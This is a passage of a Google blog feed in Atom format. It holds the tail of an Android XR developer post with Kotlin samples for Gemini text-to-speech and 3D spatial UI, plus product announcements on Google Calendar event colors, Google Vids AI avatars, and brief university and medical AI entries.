
&lt;p style="text-align: left;"&gt;Large Language Models are great at generating rich descriptions, but they can sometimes hallucinate exact latitude/longitude coordinates. To solve this, we used &lt;a href="https://ai.google.dev/gemini-api/docs/maps-grounding"&gt;Google Maps Grounding&lt;/a&gt; to ground the AI.&lt;/p&gt;

&lt;h3 style="text-align: left;"&gt;3. A Voice to Guide You: Gemini 2.5 TTS&lt;/h3&gt;
&lt;p style="text-align: left;"&gt;To make the tour guide feel truly present, we implemented dynamic voiceovers.&lt;/p&gt;

&lt;p style="text-align: left;"&gt;Using the gemini-2.5-flash-tts model, we can configure our model generation config to natively return audio data instead of just text! Here’s how you can request the ResponseModality.AUDIO:&lt;/p&gt;

&lt;pre&gt;&lt;div style="text-align: left;"&gt;val ttsModel = Firebase.ai(backend = GenerativeBackend.googleAI())&lt;/div&gt;&lt;code&gt;&lt;div style="text-align: left;"&gt;    .generativeModel(&lt;/div&gt;&lt;div style="text-align: left;"&gt;        modelName = "gemini-2.5-flash-tts",&lt;/div&gt;&lt;div style="text-align: left;"&gt;        generationConfig = generationConfig {&lt;/div&gt;&lt;div style="text-align: left;"&gt;            // Instruct the model to return Audio&lt;/div&gt;&lt;div style="text-align: left;"&gt;            responseModalities = listOf(ResponseModality.AUDIO)&lt;/div&gt;&lt;div style="text-align: left;"&gt;        }&lt;/div&gt;&lt;div style="text-align: left;"&gt;    )&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;val response = ttsModel.generateContent("Say in a neutral but positive voice:\n$prompt")&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;// Extract the raw audio bytes from the response&lt;/div&gt;&lt;div style="text-align: left;"&gt;val audioBytes = response.candidates.firstOrNull()?.content?.parts&lt;/div&gt;&lt;div style="text-align: left;"&gt;    ?.filterIsInstance&amp;lt;InlineDataPart&amp;gt;()&lt;/div&gt;&lt;div style="text-align: left;"&gt;    ?.firstOrNull { it.mimeType.contains("audio") }?.inlineData&lt;/div&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;h3 style="text-align: left;"&gt;4. Bringing it to Life in 3D with Jetpack XR&lt;/h3&gt;
&lt;p style="text-align: left;"&gt;The final piece of the puzzle is rendering this data in the user's field of view. The Jetpack XR SDK makes it intuitive to transition from  a 2D Android UI to spatial computing.&lt;/p&gt;

&lt;p style="text-align: left;"&gt;We used Jetpack Compose for XR to build spatial components. To represent points of interest along the tour, we built a Composable called InfoSphere, which contains a GltfModel of a 3D orb that floats in space and can be interacted with to reveal information.&lt;/p&gt;

&lt;p style="text-align: left;"&gt;Using Jetpack XR SDK, we can place 3D models alongside the Compose UI using &lt;a href="https://developer.android.com/reference/kotlin/androidx/xr/compose/subspace/SpatialBox.composable"&gt;SpatialBox&lt;/a&gt; and &lt;a href="https://developer.android.com/reference/kotlin/androidx/xr/compose/subspace/SceneCoreEntity.composable"&gt;SceneCoreEntity&lt;/a&gt;. We also used &lt;a href="https://developer.android.com/reference/androidx/xr/scenecore/InteractableComponent"&gt;InteractableComponent&lt;/a&gt; to respond to user taps.&lt;/p&gt;
&lt;pre&gt;&lt;div style="text-align: left;"&gt;@Composable&lt;/div&gt;&lt;code&gt;&lt;div style="text-align: left;"&gt;fun InfoSphere(&lt;/div&gt;&lt;div style="text-align: left;"&gt;    content: InfoBubbleContent,&lt;/div&gt;&lt;div style="text-align: left;"&gt;    session: Session,&lt;/div&gt;&lt;div style="text-align: left;"&gt;    sphereModel: GltfModel,&lt;/div&gt;&lt;div style="text-align: left;"&gt;    isSelected: Boolean,&lt;/div&gt;&lt;div style="text-align: left;"&gt;    onClick: () -&amp;gt; Unit&lt;/div&gt;&lt;div style="text-align: left;"&gt;) {&lt;/div&gt;&lt;div style="text-align: left;"&gt;    // SpatialBox lets us arrange 3D components and SpatialPanels together&lt;/div&gt;&lt;div style="text-align: left;"&gt;    SpatialBox(&lt;/div&gt;&lt;div style="text-align: left;"&gt;        SubspaceModifier&lt;/div&gt;&lt;div style="text-align: left;"&gt;            .offset(x = 2.dp, y = 1.dp, z = (-3).dp) // Positioned in 3D space&lt;/div&gt;&lt;div style="text-align: left;"&gt;    ) {&lt;/div&gt;&lt;div style="text-align: left;"&gt;        // Smoothly animate the visibility of our 2D Compose UI Panel&lt;/div&gt;&lt;div style="text-align: left;"&gt;        AnimatedSpatialVisibility(visible = isSelected) {&lt;/div&gt;&lt;div style="text-align: left;"&gt;            SpatialPanel {&lt;/div&gt;&lt;div style="text-align: left;"&gt;                InfoBubble(content) // Regular 2D Compose UI&lt;/div&gt;&lt;div style="text-align: left;"&gt;            }&lt;/div&gt;&lt;div style="text-align: left;"&gt;        }&lt;/div&gt;&lt;div style="text-align: left;"&gt;        // Render our interactive 3D sphere&lt;/div&gt;&lt;div style="text-align: left;"&gt;        SceneCoreEntity(&lt;/div&gt;&lt;div style="text-align: left;"&gt;            factory = {&lt;/div&gt;&lt;div style="text-align: left;"&gt;                GltfModelEntity.create(session, sphereModel).also { entity -&amp;gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;                    // Make the 3D model respond to user taps&lt;/div&gt;&lt;div style="text-align: left;"&gt;                    entity.addComponent(InteractableComponent.create(session) { inputEvent -&amp;gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;                        if (inputEvent.action == InputEvent.Action.UP) {&lt;/div&gt;&lt;div style="text-align: left;"&gt;                            onClick()&lt;/div&gt;&lt;div style="text-align: left;"&gt;                        }&lt;/div&gt;&lt;div style="text-align: left;"&gt;                    })&lt;/div&gt;&lt;div style="text-align: left;"&gt;                }&lt;/div&gt;&lt;div style="text-align: left;"&gt;            }&lt;/div&gt;&lt;div style="text-align: left;"&gt;        )&lt;/div&gt;&lt;div style="text-align: left;"&gt;    }&lt;/div&gt;&lt;div style="text-align: left;"&gt;}&lt;/div&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;p style="text-align: left;"&gt;By combining &lt;a href="https://developer.android.com/reference/kotlin/androidx/xr/compose/subspace/animation/AnimatedSpatialVisibility.composable"&gt;AnimatedSpatialVisibility&lt;/a&gt; for traditional Compose UI surfaces with SceneCoreEntity 3D elements, we're able to seamlessly blend data into the physical world.&lt;/p&gt;

&lt;h3 style="text-align: left;"&gt;Explore what’s possible with Android XR today&lt;/h3&gt;
&lt;p style="text-align: left;"&gt;Building the XR Geospatial Tour app showed us that the barrier to entry for world-scale spatial experiences is lower than ever for Android developers. With the Geospatial API now available in preview on Android XR, your apps can seamlessly understand the physical world around them. By combining &lt;a href="https://developer.android.com/develop/xr/jetpack-xr-sdk/ui-compose"&gt;Compose for XR&lt;/a&gt;’s APIs with the high-precision location data of VPS and the generative capabilities of Gemini, we can create experiences that understand both where the user is and what they are looking at.&lt;/p&gt;

&lt;p style="text-align: left;"&gt;To help you get hands-on with Android XR, we are thrilled to open applications for the &lt;a href="https://developer.android.com/develop/xr/catalyst"&gt;Android XR Developer Catalyst Program&lt;/a&gt;, which includes XREAL Project Aura. Starting today, you can apply to get access to an XREAL Project Aura devkit or our display glasses devkit over the coming months! &lt;/p&gt;

&lt;footer style="font-size: 0.85em; font-style: italic; line-height: 1.5; margin-top: 35px;"&gt;
  &lt;p style="margin: 0px 0px 8px; text-align: left;"&gt;*Disclaimer: Available on select devices. Internet connection required. Works on compatible apps and surfaces. Results may vary.&lt;/p&gt;
  &lt;p style="margin: 0px;"&gt;&lt;br /&gt;&lt;/p&gt;
&lt;/footer&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;</content>
    <link href="https://android-developers.googleblog.com/2026/06/android-xr-geospatial-api-gemini.html" rel="alternate"/>
    <category term="Android Developers"/>
    <published>2026-06-17T17:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://workspaceupdates.googleblog.com/2026/06/custom-event-colors-in-google-calendar.html</id>
    <title>Custom event colors in Google Calendar</title>
    <updated>2026-06-17T16:55:55+00:00</updated>
    <content type="html">Google Calendar is expanding its event coloring options, moving beyond the current limitation of 11 predefined colors for events. Going forward, users are offered an expanded color palette so they can personalize events and visually organize their calendar with ease, giving each user access to up to 200 custom colors for individual events via both the native web and mobile apps as well as the Calendar API. This fulfills a long-standing feature request from both business and personal users for more customizable options.&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Users will be able to select from 24 default colors. On Calendar on the web (or via API), users can define additional colors by using a full RGB color picker.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9xRNPL7N6WtsD96waYLhUh_88z5JTWrzYpUrvChMdSgzx4-5BROqd3MBsbV_AnAWtai-DCYW4xM-dj9kwjrGSg08KUXjdUjlUsAU00ioxMb90Jm0Or4FgaXVRKd-8kLvjZL-MdACdijnkzuSv-2JeCL32vrBt1H9ZYBSLnh118S-0CvpmAzbx6PfZ4RZy/s2048/Calendar%20Event%20Colors.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img alt="UI showing how to select an event color in Calendar" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9xRNPL7N6WtsD96waYLhUh_88z5JTWrzYpUrvChMdSgzx4-5BROqd3MBsbV_AnAWtai-DCYW4xM-dj9kwjrGSg08KUXjdUjlUsAU00ioxMb90Jm0Or4FgaXVRKd-8kLvjZL-MdACdijnkzuSv-2JeCL32vrBt1H9ZYBSLnh118S-0CvpmAzbx6PfZ4RZy/s16000/Calendar%20Event%20Colors.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Getting started&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Admins: &lt;/b&gt;There is no admin control for this feature.&lt;/li&gt;&lt;li&gt;&lt;b&gt;End users: &lt;/b&gt;This feature will be ON by default and can be customized by the user. Visit the Help Center to &lt;a href="https://support.google.com/calendar/answer/12377581" target="_blank"&gt;learn more&lt;/a&gt;.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Rollout pace&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid Release domains&lt;/a&gt;: Extended rollout (potentially longer than 15 days for feature visibility) starting on June 17, 2026&lt;/li&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Scheduled Release domains&lt;/a&gt;: Extended rollout (potentially longer than 15 days for feature visibility) starting on June 29, 2026&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Availability&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Available to all Google Workspace customers, Workspace Individual subscribers, and users with personal Google accounts&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Resources&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Google Help: &lt;a href="https://support.google.com/calendar/answer/12377581" target="_blank"&gt;Use labels to track calendar entries&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;</content>
    <link href="https://workspaceupdates.googleblog.com/2026/06/custom-event-colors-in-google-calendar.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-06-17T16:55:55+00:00</published>
  </entry>
  <entry>
    <id>http://workspaceupdates.googleblog.com/2026/06/custom-event-colors-in-google-calendar.html</id>
    <title>Custom event colors in Google Calendar</title>
    <updated>2026-06-17T16:55:55+00:00</updated>
    <content type="html">Google Calendar is expanding its event coloring options, moving beyond the current limitation of 11 predefined colors for events. Going forward, users are offered an expanded color palette so they can personalize events and visually organize their calendar with ease, giving each user access to up to 200 custom colors for individual events via both the native web and mobile apps as well as the Calendar API. This fulfills a long-standing feature request from both business and personal users for more customizable options.&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Users will be able to select from 24 default colors. On Calendar on the web (or via API), users can define additional colors by using a full RGB color picker.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9xRNPL7N6WtsD96waYLhUh_88z5JTWrzYpUrvChMdSgzx4-5BROqd3MBsbV_AnAWtai-DCYW4xM-dj9kwjrGSg08KUXjdUjlUsAU00ioxMb90Jm0Or4FgaXVRKd-8kLvjZL-MdACdijnkzuSv-2JeCL32vrBt1H9ZYBSLnh118S-0CvpmAzbx6PfZ4RZy/s2048/Calendar%20Event%20Colors.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img alt="UI showing how to select an event color in Calendar" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9xRNPL7N6WtsD96waYLhUh_88z5JTWrzYpUrvChMdSgzx4-5BROqd3MBsbV_AnAWtai-DCYW4xM-dj9kwjrGSg08KUXjdUjlUsAU00ioxMb90Jm0Or4FgaXVRKd-8kLvjZL-MdACdijnkzuSv-2JeCL32vrBt1H9ZYBSLnh118S-0CvpmAzbx6PfZ4RZy/s16000/Calendar%20Event%20Colors.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Getting started&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Admins: &lt;/b&gt;There is no admin control for this feature.&lt;/li&gt;&lt;li&gt;&lt;b&gt;End users: &lt;/b&gt;This feature will be ON by default and can be customized by the user. Visit the Help Center to &lt;a href="https://support.google.com/calendar/answer/12377581" target="_blank"&gt;learn more&lt;/a&gt;.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Rollout pace&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid Release domains&lt;/a&gt;: Extended rollout (potentially longer than 15 days for feature visibility) starting on June 17, 2026&lt;/li&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Scheduled Release domains&lt;/a&gt;: Extended rollout (potentially longer than 15 days for feature visibility) starting on June 29, 2026&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Availability&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Available to all Google Workspace customers, Workspace Individual subscribers, and users with personal Google accounts&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Resources&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Google Help: &lt;a href="https://support.google.com/calendar/answer/12377581" target="_blank"&gt;Use labels to track calendar entries&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;</content>
    <link href="http://workspaceupdates.googleblog.com/2026/06/custom-event-colors-in-google-calendar.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-06-17T16:55:55+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/products-and-platforms/products/education/higher-education-gemini-notebooklm/</id>
    <title>How universities are preparing students for an AI-powered future</title>
    <updated>2026-06-17T16:00:00+00:00</updated>
    <content type="html">Several students seated in a lecture hall</content>
    <link href="https://blog.google/products-and-platforms/products/education/higher-education-gemini-notebooklm/" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-17T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/innovation-and-ai/models-and-research/google-research/amie-for-disease-management-in-nature/</id>
    <title>New research shows how AMIE, our medical AI, could help manage health conditions.</title>
    <updated>2026-06-17T15:00:00+00:00</updated>
    <content type="html">&lt;img src="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/AMIE_Mx_Nature_Social_Visual_Va.max-600x600.format-webp.webp" /&gt;Research in “Nature” shows our conversational AI system matches primary care physicians in complex disease management.</content>
    <link href="https://blog.google/innovation-and-ai/models-and-research/google-research/amie-for-disease-management-in-nature/" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-17T15:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://workspaceupdates.googleblog.com/2026/06/enhanced-ai-avatars-vids.html</id>
    <title>Enhanced AI avatar features and capabilities in Google Vids</title>
    <updated>2026-06-17T14:04:27+00:00</updated>
    <content type="html">With the integration of Gemini 3.1 Flash Text-To-Speech (TTS) and the latest capabilities in Veo 3.1, AI avatars in &lt;a href="https://docs.google.com/videos/create?usp=blog" target="_blank"&gt;Google Vids&lt;/a&gt; have become more realistic and expressive than ever. We’re excited to announce expanded language support, a new collection of avatar defaults, and the ability to direct your custom avatars to take action in any generated video.&lt;div&gt;&lt;h4 style="text-align: left;"&gt;&lt;b&gt;Expanded preset avatars with more expressive speaking&lt;/b&gt;&lt;/h4&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7JULf7Ta3nwAy2x2tWoHkvEh6TAqfYSSK4sezJ5LqMJy3gtZIyLU5gIFeh3k8YtdlMzrs4WjRiSd4rMScxTZUvATJGhPSx15aLnViL03sPUyHsd2OKbHHa6IxHHz8I2KzBoSkygpUf7ftYoLaSVZZewxUYjANRyc-_tg6B5ambAvPpF2kcHlGjKI-cs9s/s1812/Realistic%20Preset%20Avatars.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img alt="Several examples of realistic avatars" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7JULf7Ta3nwAy2x2tWoHkvEh6TAqfYSSK4sezJ5LqMJy3gtZIyLU5gIFeh3k8YtdlMzrs4WjRiSd4rMScxTZUvATJGhPSx15aLnViL03sPUyHsd2OKbHHa6IxHHz8I2KzBoSkygpUf7ftYoLaSVZZewxUYjANRyc-_tg6B5ambAvPpF2kcHlGjKI-cs9s/s16000/Realistic%20Preset%20Avatars.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjw9oPDZztpNznL392ZGQAZMbqbAiq2I1NsznG9JFhHFVZVMGOD7PjDfrefqrvLzeqoNVMeoyPjymsiD7tvDBaZwJNX3L9MSpwt0jQTQUwAa2HgxOxYuk9baR2zZO1N5L6U27SA2Gg-w4yz5zGcQubtAUmI9xR1pYc0uhQB73KqSUX7ao2fiw8H3L3uNoEm/s1818/3D%20Cartoon%20Avatars.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img alt="Several examples of 3D cartoon avatars" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjw9oPDZztpNznL392ZGQAZMbqbAiq2I1NsznG9JFhHFVZVMGOD7PjDfrefqrvLzeqoNVMeoyPjymsiD7tvDBaZwJNX3L9MSpwt0jQTQUwAa2HgxOxYuk9baR2zZO1N5L6U27SA2Gg-w4yz5zGcQubtAUmI9xR1pYc0uhQB73KqSUX7ao2fiw8H3L3uNoEm/s16000/3D%20Cartoon%20Avatars.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;i&gt;Samples of new default avatars&lt;/i&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;We’ve expanded avatar options from 23 to 53 default presets, spanning photorealistic, 3D cartoon, and graphic novel styles. This broader gallery includes avatars like Sofia, Jack, Charlie, Finley, and Eleanor, all powered by Gemini Audio to speak with greater degrees of expression, realism, and conversational tones.&lt;/div&gt;&lt;h4 style="text-align: left;"&gt;&lt;b&gt;Expanded speaker support to 24 languages&lt;/b&gt;&lt;/h4&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSWKfvvmhMXqtDYmm_EYza94qX2T3xfu7y7aWJjsR7fZl1Z2CHbl6dxVwmDacRIJFx22asXaQC162_tqfnGvODa0zuku5-c42wmEmQ_gl5jIp2wembGjQvWyU5wUvtmyb6LiH6c623NIa8A71TAekNLUL4yJWUTJo12gNQumsi5cBxWXiGLoLp1G2mR0HQ/s1126/Expanded%20Languages%20Avatars.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img alt="List of supported languages" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSWKfvvmhMXqtDYmm_EYza94qX2T3xfu7y7aWJjsR7fZl1Z2CHbl6dxVwmDacRIJFx22asXaQC162_tqfnGvODa0zuku5-c42wmEmQ_gl5jIp2wembGjQvWyU5wUvtmyb6LiH6c623NIa8A71TAekNLUL4yJWUTJo12gNQumsi5cBxWXiGLoLp1G2mR0HQ/s16000/Expanded%20Languages%20Avatars.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;i&gt;Full list of language support in Google Vids UI&lt;/i&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;We’ve added support for 16 new languages, including Hindi, Bengali, Marathi, Tamil, Telugu, Arabic, Indonesian, Russian, Dutch, Polish, Thai, Turkish, Vietnamese, Romanian, and Ukrainian. 

These languages join our existing set—English, Spanish, Portuguese, Japanese, Korean, French, Italian, and German—bringing the total to 24 supported languages for AI avatar and voiceovers.&lt;/div&gt;&lt;h4 style="text-align: left;"&gt;&lt;b&gt;Create custom avatars with the latest Gemini voice model&lt;/b&gt;&lt;/h4&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjubVXQf-9RPFKjAihjT40fkqmpdkG-pjJUnROPj4nCm17T7pJ3ppSCesfyKmAjAghGXrtCPAZWvr6MBY95LdYsvAi4V5GvKJqt2BU0Una9A9D42ejiVVf31m4Gkixao6hD-94fD8FwLWou4VDrrwynv1g-MoBm1E4_Kzbr8FW3vLRhGY_RawenOqYor0V2/s1966/Custom%20Avatars.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img alt="UI for creating a custom avatar, including box to add a name" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjubVXQf-9RPFKjAihjT40fkqmpdkG-pjJUnROPj4nCm17T7pJ3ppSCesfyKmAjAghGXrtCPAZWvr6MBY95LdYsvAi4V5GvKJqt2BU0Una9A9D42ejiVVf31m4Gkixao6hD-94fD8FwLWou4VDrrwynv1g-MoBm1E4_Kzbr8FW3vLRhGY_RawenOqYor0V2/s16000/Custom%20Avatars.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;i&gt;User experience of assigning new voices to custom avatars&lt;/i&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;With custom avatars in Vids, you can design your avatar using Nano Banana Pro. Starting today, you can choose from 30+ voices powered by Gemini Audio that offer increased expression, language support, and steering control over how they speak.&lt;/div&gt;&lt;h4 style="text-align: left;"&gt;&lt;b&gt;Direct your custom avatars to take action in addition to speaking&lt;/b&gt;&lt;/h4&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJEnM21jvs5XLEyP4-_cP_O07YCp1MJ8nDiaLWHNnVaCM8-IQgr3FEzuLjEi5-DlshaKKSPNjdzNP2umrd9hyphenhyphenTyp6CSQuf8aBB9YMdYButLnvm9jiWUoUkjEuJ6i8MCEkY7ntOTnTebJQXcTyR5oWqEvt3-EysxYk-DDUeGPzVqym5VMC9vYPP1k2_MTJO/s640/Direct%20Custom%20Avatars.gif" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJEnM21jvs5XLEyP4-_cP_O07YCp1MJ8nDiaLWHNnVaCM8-IQgr3FEzuLjEi5-DlshaKKSPNjdzNP2umrd9hyphenhyphenTyp6CSQuf8aBB9YMdYButLnvm9jiWUoUkjEuJ6i8MCEkY7ntOTnTebJQXcTyR5oWqEvt3-EysxYk-DDUeGPzVqym5VMC9vYPP1k2_MTJO/s16000/Direct%20Custom%20Avatars.gif" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;i&gt;Generated sample of a directed custom avatar&lt;/i&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Previously, users could only direct default avatars. Now, you can add custom avatars as an ingredient in generated video clips, unlocking new ways to have your customized spokesperson tell your story. Every generation preserves your custom avatar's appearance and voice, ensuring your customizations are preserved throughout new generations.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Control custom actions: &lt;/b&gt;Instruct your avatar to walk, talk, and use objects simply by typing a text prompt describing their actions.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Use image references: &lt;/b&gt;Upload additional images to direct your avatar in customized locations or with branded logos.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Getting started&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Admins: &lt;/b&gt;There is no admin control for these features.&lt;/li&gt;&lt;li&gt;&lt;b&gt;End users:&lt;/b&gt; Visit the Help Center to &lt;a href="https://support.google.com/docs/answer/16334946" target="_blank"&gt;learn more about using AI avatars in Vids&lt;/a&gt;.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Rollout pace&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid Release and Scheduled Release domains&lt;/a&gt;: Full rollout (1–3 days for feature visibility) starting on June 17, 2026&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Availability&lt;/h3&gt;&lt;div&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Business: &lt;/b&gt;Business Starter, Standard, and Plus&lt;/li&gt;&lt;li&gt;&lt;b&gt;Enterprise: &lt;/b&gt;Enterprise Starter, Standard, and Plus&lt;/li&gt;&lt;li&gt;&lt;b&gt;Education: &lt;/b&gt;Education Plus&lt;/li&gt;&lt;li&gt;&lt;b&gt;Consumer: &lt;/b&gt;All users with personal Google accounts, including Google AI Pro and Ultra&lt;/li&gt;&lt;li&gt;&lt;b&gt;Other Editions: &lt;/b&gt;Enterprise Essentials, and Enterprise Essentials Plus; Nonprofits; Individual&lt;/li&gt;&lt;li&gt;&lt;b&gt;Education Add-ons: &lt;/b&gt;Teaching and Learning; Google AI Pro for Education&lt;/li&gt;&lt;li&gt;&lt;b&gt;Other Add-ons: &lt;/b&gt;AI Expanded Access*&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;div&gt;&lt;i&gt;*Users with AI Expanded Access add-on licenses have &lt;a href="https://support.google.com/a/answer/14700766" target="_blank"&gt;higher limits&lt;/a&gt; on usage of AI avatars in Vids.&lt;/i&gt;&lt;/div&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Resources&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Google Docs Editors Help: &lt;a href="https://support.google.com/docs/answer/16334946" target="_blank"&gt;Use AI avatars in Google Vids&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;/div&gt;</content>
    <link href="https://workspaceupdates.googleblog.com/2026/06/enhanced-ai-avatars-vids.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-06-17T14:04:27+00:00</published>
  </entry>
  <entry>
    <id>http://workspaceupdates.googleblog.com/2026/06/enhanced-ai-avatars-vids.html</id>
    <title>Enhanced AI avatar features and capabilities in Google Vids</title>
    <updated>2026-06-17T14:04:27+00:00</updated>
